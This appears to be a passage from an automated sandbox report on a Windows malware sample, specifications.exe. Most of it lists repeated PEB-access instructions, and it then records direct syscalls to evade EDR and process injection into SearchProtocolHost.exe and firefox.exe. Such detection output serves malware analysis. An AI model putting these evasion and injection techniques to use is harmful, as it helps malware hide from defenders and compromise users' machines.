                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110892A mov eax, dword ptr fs:[00000030h]2_2_0110892A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0111892B mov eax, dword ptr fs:[00000030h]2_2_0111892B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154940 mov eax, dword ptr fs:[00000030h]2_2_01154940
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01100946 mov eax, dword ptr fs:[00000030h]2_2_01100946
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C096E mov eax, dword ptr fs:[00000030h]2_2_010C096E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C096E mov edx, dword ptr fs:[00000030h]2_2_010C096E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C096E mov eax, dword ptr fs:[00000030h]2_2_010C096E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A6962 mov eax, dword ptr fs:[00000030h]2_2_010A6962
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A6962 mov eax, dword ptr fs:[00000030h]2_2_010A6962
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A6962 mov eax, dword ptr fs:[00000030h]2_2_010A6962
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01124978 mov eax, dword ptr fs:[00000030h]2_2_01124978
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01124978 mov eax, dword ptr fs:[00000030h]2_2_01124978
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110C97C mov eax, dword ptr fs:[00000030h]2_2_0110C97C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011089B3 mov esi, dword ptr fs:[00000030h]2_2_011089B3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011089B3 mov eax, dword ptr fs:[00000030h]2_2_011089B3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011089B3 mov eax, dword ptr fs:[00000030h]2_2_011089B3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010809AD mov eax, dword ptr fs:[00000030h]2_2_010809AD
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010809AD mov eax, dword ptr fs:[00000030h]2_2_010809AD
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A0 mov eax, dword ptr fs:[00000030h]2_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114A9D3 mov eax, dword ptr fs:[00000030h]2_2_0114A9D3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011169C0 mov eax, dword ptr fs:[00000030h]2_2_011169C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A9D0 mov eax, dword ptr fs:[00000030h]2_2_0108A9D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A9D0 mov eax, dword ptr fs:[00000030h]2_2_0108A9D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A9D0 mov eax, dword ptr fs:[00000030h]2_2_0108A9D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A9D0 mov eax, dword ptr fs:[00000030h]2_2_0108A9D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A9D0 mov eax, dword ptr fs:[00000030h]2_2_0108A9D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A9D0 mov eax, dword ptr fs:[00000030h]2_2_0108A9D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B49D0 mov eax, dword ptr fs:[00000030h]2_2_010B49D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110E9E0 mov eax, dword ptr fs:[00000030h]2_2_0110E9E0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B29F9 mov eax, dword ptr fs:[00000030h]2_2_010B29F9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B29F9 mov eax, dword ptr fs:[00000030h]2_2_010B29F9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110C810 mov eax, dword ptr fs:[00000030h]2_2_0110C810
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112483A mov eax, dword ptr fs:[00000030h]2_2_0112483A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112483A mov eax, dword ptr fs:[00000030h]2_2_0112483A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA830 mov eax, dword ptr fs:[00000030h]2_2_010BA830
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A2835 mov eax, dword ptr fs:[00000030h]2_2_010A2835
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A2835 mov eax, dword ptr fs:[00000030h]2_2_010A2835
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A2835 mov eax, dword ptr fs:[00000030h]2_2_010A2835
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A2835 mov ecx, dword ptr fs:[00000030h]2_2_010A2835
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A2835 mov eax, dword ptr fs:[00000030h]2_2_010A2835
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A2835 mov eax, dword ptr fs:[00000030h]2_2_010A2835
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01092840 mov ecx, dword ptr fs:[00000030h]2_2_01092840
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084859 mov eax, dword ptr fs:[00000030h]2_2_01084859
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084859 mov eax, dword ptr fs:[00000030h]2_2_01084859
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B0854 mov eax, dword ptr fs:[00000030h]2_2_010B0854
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01116870 mov eax, dword ptr fs:[00000030h]2_2_01116870
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01116870 mov eax, dword ptr fs:[00000030h]2_2_01116870
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110E872 mov eax, dword ptr fs:[00000030h]2_2_0110E872
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110E872 mov eax, dword ptr fs:[00000030h]2_2_0110E872
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110C89D mov eax, dword ptr fs:[00000030h]2_2_0110C89D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01080887 mov eax, dword ptr fs:[00000030h]2_2_01080887
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE8C0 mov eax, dword ptr fs:[00000030h]2_2_010AE8C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011508C0 mov eax, dword ptr fs:[00000030h]2_2_011508C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114A8E4 mov eax, dword ptr fs:[00000030h]2_2_0114A8E4
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC8F9 mov eax, dword ptr fs:[00000030h]2_2_010BC8F9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC8F9 mov eax, dword ptr fs:[00000030h]2_2_010BC8F9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FEB1D mov eax, dword ptr fs:[00000030h]2_2_010FEB1D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FEB1D mov eax, dword ptr fs:[00000030h]2_2_010FEB1D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FEB1D mov eax, dword ptr fs:[00000030h]2_2_010FEB1D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FEB1D mov eax, dword ptr fs:[00000030h]2_2_010FEB1D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FEB1D mov eax, dword ptr fs:[00000030h]2_2_010FEB1D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FEB1D mov eax, dword ptr fs:[00000030h]2_2_010FEB1D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FEB1D mov eax, dword ptr fs:[00000030h]2_2_010FEB1D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FEB1D mov eax, dword ptr fs:[00000030h]2_2_010FEB1D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FEB1D mov eax, dword ptr fs:[00000030h]2_2_010FEB1D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154B00 mov eax, dword ptr fs:[00000030h]2_2_01154B00
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AEB20 mov eax, dword ptr fs:[00000030h]2_2_010AEB20
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AEB20 mov eax, dword ptr fs:[00000030h]2_2_010AEB20
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01148B28 mov eax, dword ptr fs:[00000030h]2_2_01148B28
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01148B28 mov eax, dword ptr fs:[00000030h]2_2_01148B28
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112EB50 mov eax, dword ptr fs:[00000030h]2_2_0112EB50
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01152B57 mov eax, dword ptr fs:[00000030h]2_2_01152B57
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01152B57 mov eax, dword ptr fs:[00000030h]2_2_01152B57
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01152B57 mov eax, dword ptr fs:[00000030h]2_2_01152B57
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01152B57 mov eax, dword ptr fs:[00000030h]2_2_01152B57
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01128B42 mov eax, dword ptr fs:[00000030h]2_2_01128B42
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01116B40 mov eax, dword ptr fs:[00000030h]2_2_01116B40
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01116B40 mov eax, dword ptr fs:[00000030h]2_2_01116B40
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114AB40 mov eax, dword ptr fs:[00000030h]2_2_0114AB40
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01078B50 mov eax, dword ptr fs:[00000030h]2_2_01078B50
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01134B4B mov eax, dword ptr fs:[00000030h]2_2_01134B4B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01134B4B mov eax, dword ptr fs:[00000030h]2_2_01134B4B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107CB7E mov eax, dword ptr fs:[00000030h]2_2_0107CB7E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01134BB0 mov eax, dword ptr fs:[00000030h]2_2_01134BB0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01134BB0 mov eax, dword ptr fs:[00000030h]2_2_01134BB0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090BBE mov eax, dword ptr fs:[00000030h]2_2_01090BBE
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090BBE mov eax, dword ptr fs:[00000030h]2_2_01090BBE
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A0BCB mov eax, dword ptr fs:[00000030h]2_2_010A0BCB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A0BCB mov eax, dword ptr fs:[00000030h]2_2_010A0BCB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A0BCB mov eax, dword ptr fs:[00000030h]2_2_010A0BCB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112EBD0 mov eax, dword ptr fs:[00000030h]2_2_0112EBD0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01080BCD mov eax, dword ptr fs:[00000030h]2_2_01080BCD
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01080BCD mov eax, dword ptr fs:[00000030h]2_2_01080BCD
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01080BCD mov eax, dword ptr fs:[00000030h]2_2_01080BCD
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110CBF0 mov eax, dword ptr fs:[00000030h]2_2_0110CBF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AEBFC mov eax, dword ptr fs:[00000030h]2_2_010AEBFC
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088BF0 mov eax, dword ptr fs:[00000030h]2_2_01088BF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088BF0 mov eax, dword ptr fs:[00000030h]2_2_01088BF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088BF0 mov eax, dword ptr fs:[00000030h]2_2_01088BF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110CA11 mov eax, dword ptr fs:[00000030h]2_2_0110CA11
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AEA2E mov eax, dword ptr fs:[00000030h]2_2_010AEA2E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BCA24 mov eax, dword ptr fs:[00000030h]2_2_010BCA24
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A4A35 mov eax, dword ptr fs:[00000030h]2_2_010A4A35
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A4A35 mov eax, dword ptr fs:[00000030h]2_2_010A4A35
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090A5B mov eax, dword ptr fs:[00000030h]2_2_01090A5B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090A5B mov eax, dword ptr fs:[00000030h]2_2_01090A5B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086A50 mov eax, dword ptr fs:[00000030h]2_2_01086A50
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086A50 mov eax, dword ptr fs:[00000030h]2_2_01086A50
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086A50 mov eax, dword ptr fs:[00000030h]2_2_01086A50
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086A50 mov eax, dword ptr fs:[00000030h]2_2_01086A50
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086A50 mov eax, dword ptr fs:[00000030h]2_2_01086A50
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086A50 mov eax, dword ptr fs:[00000030h]2_2_01086A50
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01086A50 mov eax, dword ptr fs:[00000030h]2_2_01086A50
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BCA6F mov eax, dword ptr fs:[00000030h]2_2_010BCA6F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BCA6F mov eax, dword ptr fs:[00000030h]2_2_010BCA6F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BCA6F mov eax, dword ptr fs:[00000030h]2_2_010BCA6F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112EA60 mov eax, dword ptr fs:[00000030h]2_2_0112EA60
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FCA72 mov eax, dword ptr fs:[00000030h]2_2_010FCA72
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FCA72 mov eax, dword ptr fs:[00000030h]2_2_010FCA72
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA80 mov eax, dword ptr fs:[00000030h]2_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA80 mov eax, dword ptr fs:[00000030h]2_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA80 mov eax, dword ptr fs:[00000030h]2_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA80 mov eax, dword ptr fs:[00000030h]2_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA80 mov eax, dword ptr fs:[00000030h]2_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA80 mov eax, dword ptr fs:[00000030h]2_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA80 mov eax, dword ptr fs:[00000030h]2_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA80 mov eax, dword ptr fs:[00000030h]2_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA80 mov eax, dword ptr fs:[00000030h]2_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154A80 mov eax, dword ptr fs:[00000030h]2_2_01154A80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B8A90 mov edx, dword ptr fs:[00000030h]2_2_010B8A90
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088AA0 mov eax, dword ptr fs:[00000030h]2_2_01088AA0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088AA0 mov eax, dword ptr fs:[00000030h]2_2_01088AA0
                      Source: C:\Users\user\Desktop\specifications.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtUnmapViewOfSection: Direct from: 0x76F02D3CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\specifications.exeMemory written: C:\Users\user\Desktop\specifications.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: NULL target: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeSection loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread register set: target process: 8064Jump to behavior
                      Queues an APC in another process (thread injection)
